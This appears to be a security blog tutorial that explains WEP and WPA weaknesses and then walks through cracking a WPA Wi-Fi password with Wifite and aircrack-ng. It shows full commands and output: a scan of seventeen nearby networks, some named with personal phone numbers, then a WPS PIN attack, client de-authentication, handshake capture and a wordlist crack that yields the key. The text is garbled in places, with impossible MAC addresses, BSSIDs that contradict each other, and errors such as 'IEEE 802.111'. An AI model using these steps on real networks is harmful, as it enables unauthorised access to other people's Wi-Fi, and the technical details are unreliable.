Wireless Networks
Wireless network which enables end-point devices to communicate with internet by connecting to an AP device. Wiresless device are also referred as WLAN devices.
Accessing Wireless Networks
You will need wireless enabled devices such as smartphones, laptops, tablets to connect wireless networks. Today you will see most devices comes with wireless networks. For connecting with wireless network you need to go Wifi settings in your mobile, laptops. Tap on the listed wifi networks, if WLAN is asking for password. Enter password. If wireless networks are open. Simply connect to the Wifi networks.
Wireless Authentication
There are various types of wireless authentication. According to ethical hacking researcher of international institute of cyber security These authentication are used to protect Wifi networks from attackers. Mainly there are WEP, WPA, WPA2, WPS authentications.
WEP (Wired Equivalent Privacy)
WEP was developed by IEEE 802.111 wlan standards. WEP was developed to provide security equal to wired networks. WEP encrypts data which is transmitted over the network to keep WEP enable network sage from attackers.
WEP Authentication
- WEP provides two types of authentication :-
- Open System Authentication (OSA) – This method grant access to base station authentication requested based on configured policy.
- Share Key Authentication (SKA) – From here encrypted challenges are requested for access. The base station encrypts the challenge with its key responds. If the encrypted challenge matches AP value, then access is granted.
WEP Security Flaw
- Integrity Checked Using CRC (Cycle Redundancy Check) – CRC32 is comprimssed by capturing at least two packets. The bits are in the encrypted stream & checksum are modfied by attacker. So that Packed is accepted by authenticating the system which leads to unauthorised access to the network.
- WEP uses RC4 Encryption using Stream Ciphers – Steam cyphers are made up of initial value (IV) & secret key. The length of initial value is 24 Bits long with secret key it can be either 40 bits or 104 bits long. The lower value & secret key makes easy to crack it. Weaker Initial Values Combinations do not Encrypt Sufficiently. This makes more vulnerable to attack.
- WEP is based on Password – In WEP, key managment is poorly implemented. Changing keys on large networks is challenging becuase WEP does not provide an centrallized key managment system. Inital values can be reused for cracking WEP authentication.
WPA
WPA security authentication which is widely used by many orgranizations. WPA was developed by wifi alliance in response to security flaw in WEP. WPA ecrypts data on 802.11 wlans. It uses higher inintial value48 bits whereas WEP uses 24 bits. WPA also uses temporal keys to encrypt packets.
WPA Security Flaw
- WPA is vulnerable to denial of service attacks. This authentication uses pre-shared keys which uses passphrases. Week passphrases are mostly vulnerable to dictionary attacks.
Cracking Wifi passwords is very popular among pentesters/ researchers. Earlier we have shown many methods to crack Wifi passwords. Cracking into the networks has long history. Since new authentication has came to secure the Wifi Access Point. Still there are many router which lacks for providing security. Today we will show popular methods of Wifi cracking. Another tools like hashcat which is mostly used in dictionary attacks, bruteforce attacks.
Below you will see another methods for wifi cracking. It involves automated & mannual way.
Cain & Abel
Cain & abel is most popular software used in various activities. Its an password recovery tool which is used in recovering different types of passwords. It can recover passwords such as – network packet sniffing, different hashes, dictionary attacks, brute force.
- Above you can see that stored windows passwordsj through cain & abel.
Wifite
Wifite makes the Wifi cracking in automated way. You don’t have to enter each query for capturing handshake or de-authentication of clients. After starting the wifite, it will scan for the available Wifi networks. Then you have to select the target by the number. After selecting the target. Wifite will automatically capture the handshake & will de-auth the connected clients to the AP. This tool makes easy for wifi cracking. You can also checkout another methods for wifi cracking.
- For testing we have used Kali Linux 2019.1 amd64. Type git clone https://github.com/derv82/wifite2.git
- Type cd wifite2/
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/derv82/wifite2.git Cloning into 'wifite2'… remote: Enumerating objects: 1934, done. remote: Total 1934 (delta 0), reused 0 (delta 0), pack-reused 1934 Receiving objects: 100% (1934/1934), 1.09 MiB | 869.00 KiB/s, done. Resolving deltas: 100% (1413/1413), done. root@kali:/home/iicybersecurity/Downloads# cd wifite2/
- Type ls && type python wifite.py
- Tbis tool is using inbuilt wordlist – wordlist-top4800-probable.txt. You can add more keywords according to your requriment of cracking wifi passoword.
root@kali:/home/iicybersecurity/Downloads/wifite2# ls bin EVILTWIN.md MANIFEST.in README.md setup.cfg tests wifite wordlist-top4800-probable.txt Dockerfile LICENSE PMKID.md runtests.sh setup.py TODO.md Wifite.py root@kali:/home/iicybersecurity/Downloads/wifite2# python Wifite.py
. .
.´ · . . · `. wifite 2.2.5
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´
[+] Using wlan0mon already in monitor mode
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 geek_connect 11 WPA 42db yes 1
2 Pankaj@9212458712 1 WPA 31db yes
3 hidden_user 2 WPA 29db no 3
4 DIRECT-hn 6 WPA 28db yes
5 (22:15:00:33:44:78) 11 WPA 27db yes
6 naidus 6 WPA 27db no
7 Excitel 6 WPA 22db no
8 Cbi 10 WPA 21db yes 1
9 (34:12:24:67:4D:YK) 6 WPA 21db yes
10 Worldview@37 1 WPA 20db no
11 Excitel@43 7 WPA 16db no
12 Worldview@tanpreet 13 WPA 13db no
13 Bunty 4 WPA 12db no
14 MohanLalchug 10 WPA 11db lock
15 S.K.Tuli 11 WPA 10db no
16 (55:RF:B5:23:C5:90) 1 WPA 8db no
17 Rajat@wvc9312408388 1 WPA 7db no
- Press Ctrl+C
- Enter desired target. here we will type 1
[+] select target(s) (1-17) separated by commas, dashes or all: 1 + Starting attacks against C8:D7:79:50:C1:B3 (geek_connect) [+] geek_connect (51db) WPS Pixie-Dust: [--1s] Failed: Timeout after 300 seconds [+] geek_connect (50db) WPS PIN Attack: 4m55s PINs:1 Sending EAPOL (Timeouts:25, Fails:1) [+] geek_connect (51db) WPS PIN Attack: 5m2s PINs:1 Sending EAPOL (Timeouts:25, Fails:1) [+] geek_connect (46db) WPS PIN Attack: 5m3s PINs:1 Sending EAPOL (Timeouts:25, Fails:1) [+] geek_connect (46db) WPS PIN Attack: 5m3s PINs:1 Sending EAPOL (Timeouts:25, Fails:1) [+] geek_connect (47db) WPS PIN Attack: 5m5s PINs:1 Sending EAPOL (Timeouts:26, Fails:1) ^C [!] Interrupted [+] 2 attack(s) remain
- Press Ctrl + C for skipping the wps attack. This tool crack wpa2/wpa & wps passwords. Currently we are testing on wpa2.
- So we will press Ctrl + C
[+] Do you want to continue attacking, or exit (C, e)? c [+] geek_connect (42db) PMKID CAPTURE: Failed to capture PMKID [+] geek_connect (47db) WPA Handshake capture: Discovered new client: TU:QB:RT:46:AS:QW [+] geek_connect (47db) WPA Handshake capture: Discovered new client: 70:AF:EE:3Y:VB:MN [+] geek_connect (48db) WPA Handshake capture: Captured handshake [+] saving copy of handshake to hs/handshake_geekconnect_ 23:67:WW:EE:C1:WR _2019-09-14T06-50-06.cap saved [+] analysis of captured handshake file: [!] tshark: .cap file does not contain a valid handshake [+] pyrit: .cap file contains a valid handshake for 23:67:WW:EE:C1:WR (geek_connect) [+] cowpatty: .cap file contains a valid handshake for (geek_connect) [!] aircrack: .cap file does not contain a valid handshake [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-top4800-probable.txt wordlist [+] Cracking WPA Handshake: 97.67% ETA: 0s @ 2156.9kps (current key: fantasy1) [+] Cracked WPA Handshake PSK: rootuser [+] Access Point Name: geek_connect [+] Access Point BSSID: 23:67:WW:EE:C1:WR [+] Encryption: WPA [+] Handshake File: hs/handshake_geekconnect_ 23:67:WW:EE:C1:WR _2019-09-14T06-50-06.cap [+] PSK (password): rootuser [+] saved crack result to cracked.txt (1 total) [+] Finished attacking 1 target(s), exiting
- Above you can see the password which have been cracked using wifite tool. This tool consumer attacker time.
- After gathering the password attacker can used session hijacking methods to spread malwares.
- Wifite saves the .cap file in Wifite directory. You can also use the .cap file for cracking wifi password using direct aircrack-ng explained below.
root@kali:/home/iicybersecurity/Downloads/wifite2/hs# ls handshake_geekconnect_C8-D7-79-50-C1-B3_2019-09-14T06-50-06.cap
- Opening the above file in wireshark shows the eapol packets transmission.
Another Way of Wifi Cracking
Aircrack-ng
Aircrack-ng is the most popular technique which is often taught in many courses of ethical hacking & widely used in Wifi cracking. Aircrack-ng captures the handshake & de-auth the selected clients which are connected to the target bssid. Then aircrack-ng uses wordlist for cracking the password of the AP. This method involves mainly of capturing the handshake. Depend on the de-auth of clients, this attack is used. The attack is most commonly used in public places. Air-crack-ng is comes pre-installed with many linux distros.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.